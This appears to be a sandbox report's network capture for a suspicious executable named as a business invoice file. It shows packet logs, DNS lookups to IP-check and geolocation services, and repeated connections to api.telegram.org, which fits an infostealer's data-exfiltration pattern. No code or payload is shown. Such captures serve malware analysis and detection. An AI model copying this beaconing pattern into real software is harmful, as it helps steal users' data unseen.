Aug 29, 2024 12:16:24.888520956 CEST	49717	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:24.891705990 CEST	49711	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:24.897030115 CEST	80	49711	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:25.077893972 CEST	80	49711	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:25.080112934 CEST	49718	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:25.080151081 CEST	443	49718	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:25.080209017 CEST	49718	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:25.080641985 CEST	49718	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:25.080653906 CEST	443	49718	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:25.120779991 CEST	49711	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:25.537262917 CEST	443	49718	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:25.540415049 CEST	49718	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:25.540440083 CEST	443	49718	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:25.685915947 CEST	443	49718	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:25.686007977 CEST	443	49718	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:25.686144114 CEST	49718	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:25.686737061 CEST	49718	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:25.689713955 CEST	49711	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:25.690690994 CEST	49719	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:25.695171118 CEST	80	49711	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:25.695518970 CEST	80	49719	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:25.695686102 CEST	49711	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:25.695725918 CEST	49719	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:25.695883989 CEST	49719	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:25.700612068 CEST	80	49719	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:26.261574984 CEST	80	49716	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:26.308290958 CEST	49716	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:26.330928087 CEST	49720	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:26.330956936 CEST	443	49720	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:26.331079960 CEST	49720	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:26.331762075 CEST	49720	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:26.331774950 CEST	443	49720	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:26.333369970 CEST	80	49719	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:26.386413097 CEST	49719	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:26.424509048 CEST	49721	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:26.424549103 CEST	443	49721	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:26.424621105 CEST	49721	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:26.446896076 CEST	49721	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:26.446908951 CEST	443	49721	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:26.854438066 CEST	443	49720	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:26.856167078 CEST	49720	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:26.856200933 CEST	443	49720	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:27.074538946 CEST	443	49721	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:27.076198101 CEST	49721	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:27.076232910 CEST	443	49721	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:27.195957899 CEST	443	49720	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:27.196058035 CEST	443	49720	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:27.196125031 CEST	49720	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:27.196665049 CEST	49720	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:27.200530052 CEST	49716	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:27.201654911 CEST	49722	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:27.205585003 CEST	80	49716	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:27.205688000 CEST	49716	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:27.206451893 CEST	80	49722	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:27.206540108 CEST	49722	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:27.206661940 CEST	49722	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:27.211463928 CEST	80	49722	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:27.216020107 CEST	443	49721	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:27.216129065 CEST	443	49721	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:27.216178894 CEST	49721	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:27.216613054 CEST	49721	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:27.219741106 CEST	49719	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:27.220954895 CEST	49723	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:27.225794077 CEST	80	49723	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:27.225886106 CEST	49723	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:27.225965023 CEST	80	49719	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:27.225986958 CEST	49723	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:27.226020098 CEST	49719	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:27.231025934 CEST	80	49723	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:28.651659012 CEST	80	49723	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:28.653426886 CEST	49725	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:28.653470993 CEST	443	49725	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:28.653546095 CEST	49725	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:28.653786898 CEST	49725	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:28.653796911 CEST	443	49725	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:28.698911905 CEST	49723	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:28.813514948 CEST	80	49722	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:28.827050924 CEST	49726	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:28.827092886 CEST	443	49726	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:28.827166080 CEST	49726	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:28.827419043 CEST	49726	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:28.827430964 CEST	443	49726	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:28.860275984 CEST	49722	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:29.109093904 CEST	443	49725	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:29.154875994 CEST	49725	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:29.227298975 CEST	49725	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:29.227324009 CEST	443	49725	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:29.314843893 CEST	443	49726	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:29.318479061 CEST	49726	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:29.318506002 CEST	443	49726	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:29.337409973 CEST	443	49725	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:29.337523937 CEST	443	49725	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:29.337593079 CEST	49725	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:29.339098930 CEST	49725	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:29.395004988 CEST	49728	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:29.399796963 CEST	80	49728	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:29.399854898 CEST	49728	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:29.403533936 CEST	49728	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:29.408620119 CEST	80	49728	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:29.465807915 CEST	443	49726	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:29.465912104 CEST	443	49726	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:29.465958118 CEST	49726	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:29.466768980 CEST	49726	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:29.470474958 CEST	49722	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:29.471580029 CEST	49729	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:29.475775957 CEST	80	49722	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:29.475831985 CEST	49722	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:29.476392031 CEST	80	49729	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:29.476459026 CEST	49729	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:29.476536036 CEST	49729	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:29.481276035 CEST	80	49729	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:30.101130962 CEST	80	49729	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:30.102335930 CEST	49730	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:30.102375031 CEST	443	49730	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:30.102446079 CEST	49730	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:30.102710009 CEST	49730	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:30.102725983 CEST	443	49730	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:30.152030945 CEST	49729	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:30.573098898 CEST	443	49730	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:30.575022936 CEST	49730	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:30.575043917 CEST	443	49730	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:30.721493959 CEST	443	49730	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:30.721601963 CEST	443	49730	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:30.721766949 CEST	49730	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:30.722076893 CEST	49730	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:30.725965023 CEST	49729	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:30.727116108 CEST	49734	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:30.731148005 CEST	80	49729	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:30.731235981 CEST	49729	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:30.731956005 CEST	80	49734	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:30.732039928 CEST	49734	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:30.732157946 CEST	49734	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:30.736934900 CEST	80	49734	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:31.033838034 CEST	80	49728	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:31.035576105 CEST	49735	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:31.035623074 CEST	443	49735	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:31.035690069 CEST	49735	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:31.036006927 CEST	49735	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:31.036022902 CEST	443	49735	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:31.073915005 CEST	49728	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:31.357146978 CEST	80	49734	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:31.358464956 CEST	49736	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:31.358505964 CEST	443	49736	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:31.358592987 CEST	49736	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:31.358859062 CEST	49736	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:31.358872890 CEST	443	49736	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:31.402076006 CEST	49734	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:31.493491888 CEST	443	49735	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:31.524368048 CEST	49735	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:31.524393082 CEST	443	49735	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:31.647921085 CEST	443	49735	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:31.648024082 CEST	443	49735	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:31.648184061 CEST	49735	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:31.648883104 CEST	49735	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:31.654042959 CEST	49728	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:31.655325890 CEST	49737	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:31.661077976 CEST	80	49728	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:31.661334991 CEST	49728	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:31.662053108 CEST	80	49737	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:31.662120104 CEST	49737	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:31.662296057 CEST	49737	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:31.668833017 CEST	80	49737	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:31.834739923 CEST	443	49736	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:31.845524073 CEST	49736	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:31.845541000 CEST	443	49736	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:31.967895985 CEST	443	49736	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:31.967999935 CEST	443	49736	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:31.968055010 CEST	49736	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:31.968539953 CEST	49736	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:31.972305059 CEST	49734	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:31.973545074 CEST	49738	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:31.979487896 CEST	80	49734	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:31.979551077 CEST	49734	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:31.980361938 CEST	80	49738	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:31.980427027 CEST	49738	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:31.980546951 CEST	49738	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:31.987464905 CEST	80	49738	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:32.549835920 CEST	80	49737	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:32.551234961 CEST	49739	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:32.551274061 CEST	443	49739	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:32.551335096 CEST	49739	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:32.551637888 CEST	49739	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:32.551656008 CEST	443	49739	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:32.589548111 CEST	49737	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:32.630202055 CEST	80	49738	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:32.631449938 CEST	49740	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:32.631481886 CEST	443	49740	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:32.631629944 CEST	49740	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:32.631870031 CEST	49740	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:32.631890059 CEST	443	49740	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:32.683288097 CEST	49738	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:33.026663065 CEST	443	49739	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:33.028635025 CEST	49739	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:33.028676987 CEST	443	49739	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:33.091042995 CEST	443	49740	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:33.095571041 CEST	49740	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:33.095612049 CEST	443	49740	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:33.178426027 CEST	443	49739	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:33.178519964 CEST	443	49739	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:33.178585052 CEST	49739	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:33.179316044 CEST	49739	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:33.182892084 CEST	49737	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:33.184288025 CEST	49741	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:33.188196898 CEST	80	49737	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:33.188988924 CEST	49737	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:33.189222097 CEST	80	49741	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:33.189291954 CEST	49741	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:33.189429998 CEST	49741	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:33.194206953 CEST	80	49741	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:33.238720894 CEST	443	49740	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:33.238820076 CEST	443	49740	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:33.239218950 CEST	49740	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:33.239603043 CEST	49740	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:33.288820982 CEST	49738	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:33.295062065 CEST	80	49738	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:33.295950890 CEST	49738	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:33.299570084 CEST	49742	443	192.168.2.10	149.154.167.220
Aug 29, 2024 12:16:33.299614906 CEST	443	49742	149.154.167.220	192.168.2.10
Aug 29, 2024 12:16:33.299690962 CEST	49742	443	192.168.2.10	149.154.167.220
Aug 29, 2024 12:16:33.300173998 CEST	49742	443	192.168.2.10	149.154.167.220
Aug 29, 2024 12:16:33.300185919 CEST	443	49742	149.154.167.220	192.168.2.10
Aug 29, 2024 12:16:33.834775925 CEST	80	49741	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:33.836520910 CEST	49743	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:33.836570024 CEST	443	49743	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:33.836697102 CEST	49743	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:33.836960077 CEST	49743	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:33.836977005 CEST	443	49743	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:33.886452913 CEST	49741	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:33.911503077 CEST	443	49742	149.154.167.220	192.168.2.10
Aug 29, 2024 12:16:33.911629915 CEST	49742	443	192.168.2.10	149.154.167.220
Aug 29, 2024 12:16:33.914753914 CEST	49742	443	192.168.2.10	149.154.167.220
Aug 29, 2024 12:16:33.914766073 CEST	443	49742	149.154.167.220	192.168.2.10
Aug 29, 2024 12:16:33.915003061 CEST	443	49742	149.154.167.220	192.168.2.10
Aug 29, 2024 12:16:33.920099974 CEST	49742	443	192.168.2.10	149.154.167.220
Aug 29, 2024 12:16:33.960508108 CEST	443	49742	149.154.167.220	192.168.2.10
Aug 29, 2024 12:16:34.154836893 CEST	443	49742	149.154.167.220	192.168.2.10
Aug 29, 2024 12:16:34.154932976 CEST	443	49742	149.154.167.220	192.168.2.10
Aug 29, 2024 12:16:34.154993057 CEST	49742	443	192.168.2.10	149.154.167.220
Aug 29, 2024 12:16:34.157311916 CEST	49742	443	192.168.2.10	149.154.167.220
Aug 29, 2024 12:16:34.320194960 CEST	443	49743	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:34.322298050 CEST	49743	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:34.322331905 CEST	443	49743	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:34.451102018 CEST	443	49743	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:34.451231003 CEST	443	49743	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:34.451281071 CEST	49743	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:34.451724052 CEST	49743	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:34.454452991 CEST	49741	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:34.455780983 CEST	49744	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:34.460506916 CEST	80	49741	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:34.460581064 CEST	49741	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:34.461505890 CEST	80	49744	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:34.461575031 CEST	49744	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:34.461662054 CEST	49744	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:34.466646910 CEST	80	49744	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:35.112150908 CEST	80	49744	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:35.113691092 CEST	49745	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:35.113730907 CEST	443	49745	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:35.113826990 CEST	49745	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:35.114101887 CEST	49745	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:35.114115953 CEST	443	49745	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:35.167762995 CEST	49744	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:35.585953951 CEST	443	49745	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:35.587938070 CEST	49745	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:35.587969065 CEST	443	49745	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:35.726295948 CEST	443	49745	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:35.726404905 CEST	443	49745	188.114.97.3	192.168.2.10
Aug 29, 2024 12:16:35.726474047 CEST	49745	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:35.726936102 CEST	49745	443	192.168.2.10	188.114.97.3
Aug 29, 2024 12:16:35.734771013 CEST	49744	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:35.735584974 CEST	49746	443	192.168.2.10	149.154.167.220
Aug 29, 2024 12:16:35.735629082 CEST	443	49746	149.154.167.220	192.168.2.10
Aug 29, 2024 12:16:35.735752106 CEST	49746	443	192.168.2.10	149.154.167.220
Aug 29, 2024 12:16:35.736170053 CEST	49746	443	192.168.2.10	149.154.167.220
Aug 29, 2024 12:16:35.736181021 CEST	443	49746	149.154.167.220	192.168.2.10
Aug 29, 2024 12:16:35.740350962 CEST	80	49744	193.122.6.168	192.168.2.10
Aug 29, 2024 12:16:35.740427971 CEST	49744	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:36.343456030 CEST	443	49746	149.154.167.220	192.168.2.10
Aug 29, 2024 12:16:36.343576908 CEST	49746	443	192.168.2.10	149.154.167.220
Aug 29, 2024 12:16:36.345061064 CEST	49746	443	192.168.2.10	149.154.167.220
Aug 29, 2024 12:16:36.345072985 CEST	443	49746	149.154.167.220	192.168.2.10
Aug 29, 2024 12:16:36.345300913 CEST	443	49746	149.154.167.220	192.168.2.10
Aug 29, 2024 12:16:36.346755028 CEST	49746	443	192.168.2.10	149.154.167.220
Aug 29, 2024 12:16:36.388518095 CEST	443	49746	149.154.167.220	192.168.2.10
Aug 29, 2024 12:16:36.589821100 CEST	443	49746	149.154.167.220	192.168.2.10
Aug 29, 2024 12:16:36.589910984 CEST	443	49746	149.154.167.220	192.168.2.10
Aug 29, 2024 12:16:36.589983940 CEST	49746	443	192.168.2.10	149.154.167.220
Aug 29, 2024 12:16:36.590548038 CEST	49746	443	192.168.2.10	149.154.167.220
Aug 29, 2024 12:16:39.374872923 CEST	49712	80	192.168.2.10	193.122.6.168
Aug 29, 2024 12:16:41.799983025 CEST	49723	80	192.168.2.10	193.122.6.168

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 29, 2024 12:16:15.243599892 CEST	61408	53	192.168.2.10	1.1.1.1
Aug 29, 2024 12:16:15.250833035 CEST	53	61408	1.1.1.1	192.168.2.10
Aug 29, 2024 12:16:16.748799086 CEST	50350	53	192.168.2.10	1.1.1.1
Aug 29, 2024 12:16:16.756159067 CEST	53	50350	1.1.1.1	192.168.2.10
Aug 29, 2024 12:16:33.289601088 CEST	49962	53	192.168.2.10	1.1.1.1
Aug 29, 2024 12:16:33.298933029 CEST	53	49962	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 29, 2024 12:16:15.243599892 CEST	192.168.2.10	1.1.1.1	0x3188	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:16:16.748799086 CEST	192.168.2.10	1.1.1.1	0xe423	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:16:33.289601088 CEST	192.168.2.10	1.1.1.1	0xe0ff	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 29, 2024 12:16:15.250833035 CEST	1.1.1.1	192.168.2.10	0x3188	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 29, 2024 12:16:15.250833035 CEST	1.1.1.1	192.168.2.10	0x3188	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:16:15.250833035 CEST	1.1.1.1	192.168.2.10	0x3188	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:16:15.250833035 CEST	1.1.1.1	192.168.2.10	0x3188	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:16:15.250833035 CEST	1.1.1.1	192.168.2.10	0x3188	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:16:15.250833035 CEST	1.1.1.1	192.168.2.10	0x3188	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:16:16.756159067 CEST	1.1.1.1	192.168.2.10	0xe423	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:16:16.756159067 CEST	1.1.1.1	192.168.2.10	0xe423	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 29, 2024 12:16:33.298933029 CEST	1.1.1.1	192.168.2.10	0xe0ff	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49706	193.122.6.168	80	4820	C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:16:15.272239923 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
